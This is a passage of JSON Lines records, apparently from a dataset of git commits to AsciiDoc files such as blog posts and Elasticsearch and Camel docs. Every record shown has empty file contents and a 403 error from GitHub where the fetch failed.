s\/elasticsearch,codebunt\/elasticsearch,hanswang\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,ckclark\/elasticsearch,szroland\/elasticsearch,fforbeck\/elasticsearch,iantruslove\/elasticsearch,wayeast\/elasticsearch,mkis-\/elasticsearch,jimczi\/elasticsearch,markllama\/elasticsearch,nellicus\/elasticsearch,salyh\/elasticsearch,TonyChai24\/ESSource,cwurm\/elasticsearch,sjohnr\/elasticsearch,salyh\/elasticsearch,phani546\/elasticsearch,cnfire\/elasticsearch-1,yongminxia\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sarwarbhuiyan\/elasticsearch,koxa29\/elasticsearch,schonfeld\/elasticsearch,wayeast\/elasticsearch,alexbrasetvik\/elasticsearch,polyfractal\/elasticsearch,pranavraman\/elasticsearch,chrismwendt\/elasticsearch,ckclark\/elasticsearch,areek\/elasticsearch,uschindler\/elasticsearch,markllama\/elasticsearch,hanswang\/elasticsearch,humandb\/elasticsearch,lks21c\/elasticsearch,Flipkart\/elasticsearch,Ansh90\/elasticsearch,peschlowp\/elasticsearch,khiraiwa\/elasticsearch,caengcjd\/elasticsearch,huypx1292\/elasticsearch,alexksikes\/elasticsearch,mmaracic\/elasticsearch,MaineC\/elasticsearch,sjohnr\/elasticsearch,masterweb121\/elasticsearch,henakamaMSFT\/elasticsearch,mute\/elasticsearch,hafkensite\/elasticsearch,JervyShi\/elasticsearch,golubev\/elasticsearch,alexksikes\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,pranavraman\/elasticsearch,mmaracic\/elasticsearch,hanst\/elasticsearch,acchen97\/elasticsearch,mute\/elasticsearch,skearns64\/elasticsearch,milodky\/elasticsearch,kalburgimanjunath\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,franklanganke\/elasticsearch,glefloch\/elasticsearch,Collaborne\/elasticsearch,lmtwga\/elasticsearch,hirdesh2008\/elasticsearch,Collaborne\/elasticsearch,codebunt\/elasticsearch,alexksikes\/elasticsearch,JSCooke\/elasticsearch,cnfire\/elasticsearch-1,sreeramjayan\/elasticsearch,kenshin233\/elasticsearch,kingaj\/elasticsearch,spiegela\/elasticsearch,schonfeld\/elasticsearch,acchen97\/elasticsearch,mkis-\/elasticsearch,artnowo\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jbertouch\/elasticsearch,xpandan\/elasticsearch,mgalushka\/elasticsearch,jaynblue\/elasticsearch,iacdingping\/elasticsearch,hirdesh2008\/elasticsearch,combinatorist\/elasticsearch,IanvsPoplicola\/elasticsearch,wimvds\/elasticsearch,pritishppai\/elasticsearch,bawse\/elasticsearch,zhiqinghuang\/elasticsearch,mjhennig\/elasticsearch,wayeast\/elasticsearch,franklanganke\/elasticsearch,Asimov4\/elasticsearch,Microsoft\/elasticsearch,luiseduardohdbackup\/elasticsearch,jimczi\/elasticsearch,yuy168\/elasticsearch,StefanGor\/elasticsearch,vingupta3\/elasticsearch,andrestc\/elasticsearch,Brijeshrpatel9\/elasticsearch,HarishAtGitHub\/elasticsearch,HarishAtGitHub\/elasticsearch,mkis-\/elasticsearch,apepper\/elasticsearch,smflorentino\/elasticsearch,sneivandt\/elasticsearch,xingguang2013\/elasticsearch,mjhennig\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,brandonkearby\/elasticsearch,humandb\/elasticsearch,zhaocloud\/elasticsearch,sreeramjayan\/elasticsearch,micpalmia\/elasticsearch,uschindler\/elasticsearch,anti-social\/elasticsearch,mgalushka\/elasticsearch,zeroctu\/elasticsearch,xpandan\/elasticsearch,wbowling\/elasticsearch,wayeast\/elasticsearch,Brijeshrpatel9\/elasticsearch,wuranbo\/elasticsearch,queirozfcom\/elasticsearch,humandb\/elasticsearch,drewr\/elasticsearch,anti-social\/elasticsearch,camilojd\/elasticsearch,mkis-\/elasticsearch,MjAbuz\/elasticsearch,AshishThakur\/elasticsearch,HarishAtGitHub\/elasticsearch,palecur\/elasticsearch,achow\/elasticsearch,lmtwga\/elasticsearch,huanzhong\/elasticsearch,camilojd\/elasticsearch,vrkansagara\/elasticsearch,ckclark\/elasticsearch,mcku\/elasticsearch,kalimatas\/elasticsearch,camilojd\/elasticsearch,heng4fun\/elasticsearch,gingerwizard\/elasticsearch,gmarz\/elasticsearch,xuzha\/elasticsearch,dylan8902\/elasticsearch,elancom\/elasticsearch,Helen-Zhao\/elasticsearch,vvcephei\/elasticsearch,alexshadow007\/elasticsearch,wittyameta\/elasticsearch,ESamir\/elasticsearch,andrejserafim\/elasticsearch,coding0011\/elasticsearch,mbrukman\/elasticsearch,JervyShi\/elasticsearch,Stacey-Gammon\/elasticsearch,andrestc\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,aglne\/elasticsearch,awislowski\/elasticsearch,Charlesdong\/elasticsearch,NBSW\/elasticsearch,wenpos\/elasticsearch,alexbrasetvik\/elasticsearch,schonfeld\/elasticsearch,pozhidaevak\/elasticsearch,franklanganke\/elasticsearch,SergVro\/elasticsearch,mikemccand\/elasticsearch,likaiwalkman\/elasticsearch,jw0201\/elastic,yynil\/elasticsearch,brwe\/elasticsearch,luiseduardohdbackup\/elasticsearch,JSCooke\/elasticsearch,cnfire\/elasticsearch-1,golubev\/elasticsearch,PhaedrusTheGreek\/elasticsearch,strapdata\/elassandra-test,scottsom\/elasticsearch,chrismwendt\/elasticsearch,szroland\/elasticsearch,spiegela\/elasticsearch,nilabhsagar\/elasticsearch,cwurm\/elasticsearch,iantruslove\/elasticsearch,polyfractal\/elasticsearch,MisterAndersen\/elasticsearch,scorpionvicky\/elasticsearch,alexkuk\/elasticsearch,jbertouch\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,mm0\/elasticsearch,hechunwen\/elasticsearch,fforbeck\/elasticsearch,jchampion\/elasticsearch,jango2015\/elasticsearch,milodky\/elasticsearch,LewayneNaidoo\/elasticsearch,vietlq\/elasticsearch,himanshuag\/elasticsearch,andrestc\/elasticsearch,petabytedata\/elasticsearch,janmejay\/elasticsearch,sjohnr\/elasticsearch,franklanganke\/elasticsearch,jango2015\/elasticsearch,mbrukman\/elasticsearch,pablocastro\/elasticsearch,slavau\/elasticsearch,abhijitiitr\/es,LewayneNaidoo\/elasticsearch,loconsolutions\/elasticsearch,gfyoung\/elasticsearch,dataduke\/elasticsearch,alexbrasetvik\/elasticsearch,beiske\/elasticsearch,fooljohnny\/elasticsearch,lchennup\/elasticsearch,springning\/elasticsearch,dpursehouse\/elasticsearch,18098924759\/elasticsearch,xuzha\/elasticsearch,JackyMai\/elasticsearch,jimczi\/elasticsearch,wimvds\/elasticsearch,JervyShi\/elasticsearch,Uiho\/elasticsearch,wittyameta\/elasticsearch,javachengwc\/elasticsearch,fubuki\/elasticsearch,yuy168\/elasticsearch,strapdata\/elassandra-test,sposam\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,loconsolutions\/elasticsearch,fekaputra\/elasticsearch,mohit\/elasticsearch,kingaj\/elasticsearch,mohsinh\/elasticsearch,mkis-\/elasticsearch,weipinghe\/elasticsearch,sscarduzio\/elasticsearch,NBSW\/elasticsearch,fekaputra\/elasticsearch,thecocce\/elasticsearch,martinstuga\/elasticsearch,EasonYi\/elasticsearch,salyh\/elasticsearch,ulkas\/elasticsearch,spiegela\/elasticsearch,NBSW\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,slavau\/elasticsearch,queirozfcom\/elasticsearch,wimvds\/elasticsearch,dongjoon-hyun\/elasticsearch,marcuswr\/elasticsearch-dateline,javachengwc\/elasticsearch,kubum\/elasticsearch,jprante\/elasticsearch,Brijeshrpatel9\/elasticsearch,acchen97\/elasticsearch,umeshdangat\/elasticsearch,hydro2k\/elasticsearch,LewayneNaidoo\/elasticsearch,btiernay\/elasticsearch,andrestc\/elasticsearch,nazarewk\/elasticsearch,SergVro\/elasticsearch,dataduke\/elasticsearch,winstonewert\/elasticsearch,ESamir\/elasticsearch,Clairebi\/ElasticsearchClone,jaynblue\/elasticsearch,Fsero\/elasticsearch,jimhooker2002\/elasticsearch,mnylen\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,mm0\/elasticsearch,kevinkluge\/elasticsearch,sreeramjayan\/elasticsearch,yynil\/elasticsearch,ImpressTV\/elasticsearch,YosuaMichael\/elasticsearch,acchen97\/elasticsearch,kenshin233\/elasticsearch,mrorii\/elasticsearch,achow\/elasticsearch","old_file":"rest-api-spec\/test\/README.asciidoc","new_file":"rest-api-spec\/test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"722130c044032b6c500cfd6e5f5fc6d683c223cf","subject":"Update 2015-04-18-Update-Whats-New-in-Version-030.adoc","message":"Update 2015-04-18-Update-Whats-New-in-Version-030.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-04-18-Update-Whats-New-in-Version-030.adoc","new_file":"_posts\/2015-04-18-Update-Whats-New-in-Version-030.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f49b7cfdb35c155a42d3cdf2612b30e788e5f5c","subject":"y2b create post Fixing The Terrible MacBook Pro...","message":"y2b create post Fixing The Terrible MacBook Pro...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-22-Fixing-The-Terrible-MacBook-Pro.adoc","new_file":"_posts\/2017-01-22-Fixing-The-Terrible-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d099b3230733106413ed11845a1d6994edb3cb","subject":"y2b create post Is This The Future Of Keyboards?","message":"y2b create post Is This The Future Of Keyboards?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-03-Is-This-The-Future-Of-Keyboards.adoc","new_file":"_posts\/2017-09-03-Is-This-The-Future-Of-Keyboards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b8783ce63970879c37e2dae1eec40038f40fa86","subject":"y2b create post Unboxing The Samsung Galaxy S9 Clone","message":"y2b create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-01-UnboxingTheSamsungGalaxyS9Clone.adoc","new_file":"_posts\/2018-02-01-UnboxingTheSamsungGalaxyS9Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b628815dbeea3e2e7bdbd7ffabe500678d2edbd5","subject":"[DOCS] Fixed link to X-Pack transport client","message":"[DOCS] Fixed link to X-Pack transport client\n\nOriginal commit: elastic\/x-pack-elasticsearch@0870334e4b8bf5d23ed26dd755073c42fcb486da\n","repos":"nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2821c984e49d0ddbe33fbac088b21fff9451df54","subject":"Publish 2016-7-19-and.adoc","message":"Publish 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e113232f8e41f4b83e85eb3819e9bf5120645d15","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582e7e7c7614fc92b4102e98682002ab861779a5","subject":"y2b create post See-Through Buttons For Your Laptop!","message":"y2b create post See-Through Buttons For Your Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-25-SeeThrough-Buttons-For-Your-Laptop.adoc","new_file":"_posts\/2017-05-25-SeeThrough-Buttons-For-Your-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b37cf589471d3e3c1e12c2c2fa4d2f887ac1aab","subject":"CAMEL-13390 - Regen docs","message":"CAMEL-13390 - Regen docs\n","repos":"christophd\/camel,cunningt\/camel,ullgren\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,adessaigne\/camel,ullgren\/camel,pax95\/camel,nicolaferraro\/camel,mcollovati\/camel,nicolaferraro\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,gnodet\/camel,CodeSmell\/camel,ullgren\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,objectiser\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,tadayosi\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,christophd\/camel,christophd\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,ullgren\/camel,nikhilvibhav\/camel,apache\/camel,objectiser\/camel,zregvart\/camel,pmoerenhout\/camel,davidkarlsen\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,Fabryprog\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,tadayosi\/camel,Fabryprog\/camel,CodeSmell\/camel,apache\/camel,christophd\/camel,Fabryprog\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,Fabryprog\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,alvinkwekel\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,davidkarlsen\/camel,pax95\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,adessaigne\/camel,CodeSmell\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/jira-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/jira-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9e4be48978f73e32a583840047cbde4e39fc042","subject":"Update 2015-03-11-Metaphoric-using-HubPress.adoc","message":"Update 2015-03-11-Metaphoric-using-HubPress.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Metaphoric-using-HubPress.adoc","new_file":"_posts\/2015-03-11-Metaphoric-using-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6901a179352887243202e8ad9656cb19344328a","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddde797c8d05692bfa439eda842bcd5d52ceb147","subject":"Update 2016-12-04-Docker-starter-kit-part-2.adoc","message":"Update 2016-12-04-Docker-starter-kit-part-2.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-12-04-Docker-starter-kit-part-2.adoc","new_file":"_posts\/2016-12-04-Docker-starter-kit-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb0e488352a85df4ab53682e3eb30de5620f9b9","subject":"Update 2017-02-08-Native-query-in-Hibernate.adoc","message":"Update 2017-02-08-Native-query-in-Hibernate.adoc","repos":"celsogg\/blog,celsogg\/blog,celsogg\/blog,celsogg\/blog","old_file":"_posts\/2017-02-08-Native-query-in-Hibernate.adoc","new_file":"_posts\/2017-02-08-Native-query-in-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/celsogg\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9a064845a64cbe9921b58609108acc15a0b01b4","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9dd99f757d30bb616f478de0cab8f15f5b0cd28","subject":"Renamed '_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc' to '_posts\/2017-09-14-How-to-type-really-fast.adoc'","message":"Renamed '_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc' to '_posts\/2017-09-14-How-to-type-really-fast.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-14-How-to-type-really-fast.adoc","new_file":"_posts\/2017-09-14-How-to-type-really-fast.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604709dd68e260bc72137ee8b4f617374bb0734e","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676be82dd59c171bf45eec228f17c941ea7f4a24","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bab6878209f58ad58bb966910b8b6db2e764c33","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83af6b6741a778bab270ace17fbff78490983e4","subject":"First draft of core concept ascii doc","message":"First draft of core concept ascii doc\n","repos":"paulcwarren\/spring-content,paulcwarren\/spring-content,paulcwarren\/spring-content","old_file":"spring-content-commons\/src\/main\/asciidoc\/content-repositories.adoc","new_file":"spring-content-commons\/src\/main\/asciidoc\/content-repositories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paulcwarren\/spring-content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c98f616c2f63c8520bd5b31f5b33d35c97f33342","subject":"Update 2015-11-27-JSF-Custom-Components-Development.adoc","message":"Update 2015-11-27-JSF-Custom-Components-Development.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-JSF-Custom-Components-Development.adoc","new_file":"_posts\/2015-11-27-JSF-Custom-Components-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11880532cac74f95c6ab86c70e1ed471636bd09a","subject":"Update 2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","message":"Update 2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","new_file":"_posts\/2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43ac2968a0256b7e8d92c17e0b8a5ffe9bf3b3cd","subject":"write(promise-done): `Promise.prototype.done` \u3068\u306f\u4f55\u304b\u306e\u5e8f\u6587\u3092\u8ffd\u52a0","message":"write(promise-done): `Promise.prototype.done` \u3068\u306f\u4f55\u304b\u306e\u5e8f\u6587\u3092\u8ffd\u52a0\n","repos":"purepennons\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,azu\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,genie88\/promises-book,liubin\/promises-book,cqricky\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,wenber\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,azu\/promises-book,charlenopires\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,sunfurong\/promise,wenber\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,oToUC\/promises-book,cqricky\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,dieface\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"432cf837ebabdfdca892743c1b79251e20e8c5d1","subject":"y2b create post 1TB storage for your iPad? -- Corsair Voyager Air Unboxing \\u0026 Overview","message":"y2b create post 1TB storage for your iPad? -- Corsair Voyager Air Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-20-1TB-storage-for-your-iPad--Corsair-Voyager-Air-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-20-1TB-storage-for-your-iPad--Corsair-Voyager-Air-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9ff717f76474d4ea34273e03b23916324e38cd","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"765f3130fa05979f5837c903ace3943160c1e9d9","subject":"y2b create post SWITCHING TO BLACKBERRY","message":"y2b create post SWITCHING TO BLACKBERRY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-18-SWITCHING-TO-BLACKBERRY.adoc","new_file":"_posts\/2016-02-18-SWITCHING-TO-BLACKBERRY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 